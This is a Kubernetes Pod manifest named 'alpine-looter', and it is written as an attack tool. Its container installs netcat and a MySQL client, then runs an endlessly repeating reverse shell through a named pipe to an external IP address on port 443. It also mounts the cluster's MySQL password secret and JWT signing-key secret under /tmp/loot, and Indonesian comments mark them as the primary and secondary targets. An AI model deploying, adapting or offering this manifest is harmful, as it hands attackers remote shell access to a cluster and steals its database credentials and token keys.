apiVersion: v1
kind: Pod
metadata:
  name: auto-v2
  namespace: backbase
spec:
  containers:
  - name: alpine-looter
    image: alpine:latest
    command: ["/bin/sh", "-c"]
    args:
    - |
      apk add --update netcat-openbsd python3 mysql-client
      while true; do
        rm -f /tmp/f; mkfifo /tmp/f
        cat /tmp/f | /bin/sh -i 2>&1 | nc 203.175.125.130 443 > /tmp/f
        sleep 5
      done
    volumeMounts:
    - name: v-mysql
      mountPath: /tmp/loot/mysql
    - name: v-jwt
      mountPath: /tmp/loot/jwt
  volumes:
  - name: v-mysql
    secret:
      secretName: mysql-secret # <--- TARGET UTAMA: PASSWORD DB
      optional: true
  - name: v-jwt
    secret:
      secretName: jwt-secret # <--- TARGET KEDUA: KUNCI JWT
      optional: true
  restartPolicy: Never
